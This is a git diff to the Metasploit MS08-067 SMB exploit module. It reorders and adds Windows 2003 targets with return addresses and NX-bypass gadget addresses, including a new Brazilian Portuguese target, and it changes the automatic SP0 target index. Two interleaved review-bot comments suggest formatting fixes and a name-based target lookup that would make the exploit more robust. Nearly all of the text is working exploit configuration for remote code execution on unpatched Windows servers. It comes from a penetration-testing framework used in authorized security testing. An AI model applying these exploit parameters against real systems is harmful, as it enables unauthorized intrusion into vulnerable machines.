diff --git a/modules/exploits/windows/smb/ms08_067_netapi.rb b/modules/exploits/windows/smb/ms08_067_netapi.rb
index a115dae584..6abb686312 100644
--- a/modules/exploits/windows/smb/ms08_067_netapi.rb
+++ b/modules/exploits/windows/smb/ms08_067_netapi.rb
@@ -88,6 +88,14 @@ class Metasploit3 < Msf::Exploit::Remote
 }
 ], # JMP ESI SVCHOST.EXE
 
+ # Standard return-to-ESI without NX bypass
+ ['Windows 2003 SP0 Universal',
+ {
+ 'Ret' => 0x0100129e,
+ 'Scratch' => 0x00020408,
+ }
+ ], # JMP ESI SVCHOST.EXE
+
 #
 # ENGLISH TARGETS
 #
@@ -128,79 +136,6 @@ class Metasploit3 < Msf::Exploit::Remote
 }
 ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
 
- # Standard return-to-ESI without NX bypass
- ['Windows 2003 SP0 Universal',
- {
- 'Ret' => 0x0100129e,
- 'Scratch' => 0x00020408,
- }
- ], # JMP ESI SVCHOST.EXE
-
- # Standard return-to-ESI without NX bypass
- ['Windows 2003 SP1 English (NO NX)',
- {
- 'Ret' => 0x71bf21a2,
- 'Scratch' => 0x00020408,
- }
- ], # JMP ESI WS2HELP.DLL
-
- # Brett Moore's crafty NX bypass for 2003 SP1
- ['Windows 2003 SP1 English (NX)',
- {
- 'RetDec' => 0x7c90568c, # dec ESI, ret @SHELL32.DLL
- 'RetPop' => 0x7ca27cf4, # push ESI, pop EBP, ret @SHELL32.DLL
- 'JmpESP' => 0x7c86fed3, # jmp ESP @NTDLL.DLL
- 'DisableNX' => 0x7c83e413, # NX disable @NTDLL.DLL
- 'Scratch' => 0x00020408,
- }
- ],
-
- # Standard return-to-ESI without NX bypass
- ['Windows 2003 SP1 Japanese (NO NX)',
- {
- 'Ret' => 0x71a921a2,
- 'Scratch' => 0x00020408,
- }
- ], # JMP ESI WS2HELP.DLL
-
- # Standard return-to-ESI without NX bypass
- ['Windows 2003 SP2 English (NO NX)',
- {
- 'Ret' => 0x71bf3969,
- 'Scratch' => 0x00020408,
- }
- ], # JMP ESI WS2HELP.DLL
-
- # Brett Moore's crafty NX bypass for 2003 SP2
- ['Windows 2003 SP2 English (NX)',
- {
- 'RetDec' => 0x7c86beb8, # dec ESI, ret @NTDLL.DLL
- 'RetPop' => 0x7ca1e84e, # push ESI, pop EBP, ret @SHELL32.DLL
- 'JmpESP' => 0x7c86a01b, # jmp ESP @NTDLL.DLL
- 'DisableNX' => 0x7c83f517, # NX disable @NTDLL.DLL
- 'Scratch' => 0x00020408,
- }
- ],
-
- # Standard return-to-ESI without NX bypass
- ['Windows 2003 SP2 German (NO NX)',
- {
- 'Ret' => 0x71a03969,
- 'Scratch' => 0x00020408,
- }
- ], # JMP ESI WS2HELP.DLL
-
- # Brett Moore's crafty NX bypass for 2003 SP2
- ['Windows 2003 SP2 German (NX)',
- {
- 'RetDec' => 0x7c98beb8, # dec ESI, ret @NTDLL.DLL
- 'RetPop' => 0x7cb3e84e, # push ESI, pop EBP, ret @SHELL32.DLL
- 'JmpESP' => 0x7c98a01b, # jmp ESP @NTDLL.DLL
- 'DisableNX' => 0x7c95f517, # NX disable @NTDLL.DLL
- 'Scratch' => 0x00020408,
- }
- ],
-
 #
 # NON-ENGLISH TARGETS - AUTOMATICALLY GENERATED
 #
@@ -637,12 +572,34 @@ class Metasploit3 < Msf::Exploit::Remote
 }
 ], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL
 
+ #
+ # Windows 2003 Targets
+ #
+
 # Standard return-to-ESI without NX bypass
- # Provided by Masashi Fujiwara
- ['Windows 2003 SP2 Japanese (NO NX)',
+ ['Windows 2003 SP1 English (NO NX)',
 {
- 'Ret' => 0x71a91ed2,
- 'Scratch' => 0x00020408
+ 'Ret' => 0x71bf21a2,
+ 'Scratch' => 0x00020408,
+ }
+ ], # JMP ESI WS2HELP.DLL
+
+ # Brett Moore's crafty NX bypass for 2003 SP1
+ ['Windows 2003 SP1 English (NX)',
+ {
+ 'RetDec' => 0x7c90568c, # dec ESI, ret @SHELL32.DLL
+ 'RetPop' => 0x7ca27cf4, # push ESI, pop EBP, ret @SHELL32.DLL
+ 'JmpESP' => 0x7c86fed3, # jmp ESP @NTDLL.DLL
+ 'DisableNX' => 0x7c83e413, # NX disable @NTDLL.DLL
+ 'Scratch' => 0x00020408,
+ }
+ ],
+
+ # Standard return-to-ESI without NX bypass
+ ['Windows 2003 SP1 Japanese (NO NX)',
+ {
+ 'Ret' => 0x71a921a2,
+ 'Scratch' => 0x00020408,
 }
 ], # JMP ESI WS2HELP.DLL
 
@@ -665,6 +622,54 @@ class Metasploit3 < Msf::Exploit::Remote
 }
 ],
 
+ # Standard return-to-ESI without NX bypass
+ ['Windows 2003 SP2 English (NO NX)',
+ {
+ 'Ret' => 0x71bf3969,
+ 'Scratch' => 0x00020408,
+ }
+ ], # JMP ESI WS2HELP.DLL
+
+ # Brett Moore's crafty NX bypass for 2003 SP2
+ ['Windows 2003 SP2 English (NX)',
+ {
+ 'RetDec' => 0x7c86beb8, # dec ESI, ret @NTDLL.DLL
+ 'RetPop' => 0x7ca1e84e, # push ESI, pop EBP, ret @SHELL32.DLL
+ 'JmpESP' => 0x7c86a01b, # jmp ESP @NTDLL.DLL
+ 'DisableNX' => 0x7c83f517, # NX disable @NTDLL.DLL
+ 'Scratch' => 0x00020408,
+ }
+ ],
+
+ # Standard return-to-ESI without NX bypass
+ ['Windows 2003 SP2 German (NO NX)',
+ {
+ 'Ret' => 0x71a03969,
+ 'Scratch' => 0x00020408,
+ }
+ ], # JMP ESI WS2HELP.DLL
+
+ # Brett Moore's crafty NX bypass for 2003 SP2
+ ['Windows 2003 SP2 German (NX)',
+ {
+ 'RetDec' => 0x7c98beb8, # dec ESI, ret @NTDLL.DLL
+ 'RetPop' => 0x7cb3e84e, # push ESI, pop EBP, ret @SHELL32.DLL
+ 'JmpESP' => 0x7c98a01b, # jmp ESP @NTDLL.DLL
+ 'DisableNX' => 0x7c95f517, # NX disable @NTDLL.DLL
+ 'Scratch' => 0x00020408,
+ }
+ ],
+
+ # Brett Moore's crafty NX bypass for 2003 SP2 (target by Anderson Bargas)
+ [ 'Windows 2003 SP2 Portuguese - Brazilian (NX)',
+ {
+ 'RetDec' => 0x7c97beb8, # dec ESI, ret @NTDLL.DLL OK
+ 'RetPop' => 0x7cb2e84e, # push ESI, pop EBP, ret @SHELL32.DLL OK
+ 'JmpESP' => 0x7c97a01b, # jmp ESP @NTDLL.DLL OK
+ 'DisableNX' => 0x7c94f517, # NX disable @NTDLL.DLL
+ 'Scratch' => 0x00020408,
+ }
+ ],
 # Standard return-to-ESI without NX bypass
 ['Windows 2003 SP2 Spanish (NO NX)',
 {
@@ -682,7 +687,16 @@ class Metasploit3 < Msf::Exploit::Remote
 'DisableNX' => 0x7c83f517, # NX disable @NTDLL.DLL
 'Scratch' => 0x00020408,
 }
- ]
+ ],
+
+ # Standard return-to-ESI without NX bypass
+ # Provided by Masashi Fujiwara
+ ['Windows 2003 SP2 Japanese (NO NX)',
+ {
+ 'Ret' => 0x71a91ed2,
+ 'Scratch' => 0x00020408
+ }
+ ], # JMP ESI WS2HELP.DLL
 
 #
 # Missing Targets
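Review bot: The new 'Windows 2003 SP2 Portuguese - Brazilian (NX)' entry in hunk @@ -665 is formatted unlike its siblings: `[ 'Windows 2003 SP2 Portuguese - Brazilian (NX)',` has a space after the opening bracket where every other target is written `['...`, and its closing `],` runs straight into the `# Standard return-to-ESI without NX bypass` comment of the Spanish target with no separating blank line. The same entry carries a trailing `OK` on three of its four address comments but not on `'DisableNX'`; if that marker means the value was checked, the comment should either add it or say `# NX disable @NTDLL.DLL (unverified)` so the next maintainer knows which field still needs attention. The Japanese entry moved in hunk @@ -682 likewise drops the trailing comma after `'Scratch' => 0x00020408` that every surrounding hash uses; harmless in Ruby, but worth aligning while the block is being touched.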
@@ -826,7 +840,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 # Windows 2003 SP0 is mostly universal
 if fprint['os'] == 'Windows 2003' and fprint['sp'] == 'No Service Pack'
- mytarget = targets[7]
+ mytarget = targets[3]
 end
 
 # Windows 2003 R2 is treated the same as 2003
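Review bot: `mytarget = targets[3]` keeps the automatic SP0 selection tied to the position of the 'Windows 2003 SP0 Universal' entry in the `targets` array, and this very commit had to change the index from 7 to 3 because entries were moved; the next reorder will silently pick a different target with no error. Looking the entry up by name, `mytarget = targets.find { |t| t.name == 'Windows 2003 SP0 Universal' }`, survives reordering, and a nil check on the result (or the module's usual failure helper) would turn a renamed entry into a clear error instead of letting a wrong or nil target reach the code below. The fingerprint-matching method this line sits in starts and ends outside the hunk, so I cannot tell whether other `targets[N]` lookups in it need the same treatment.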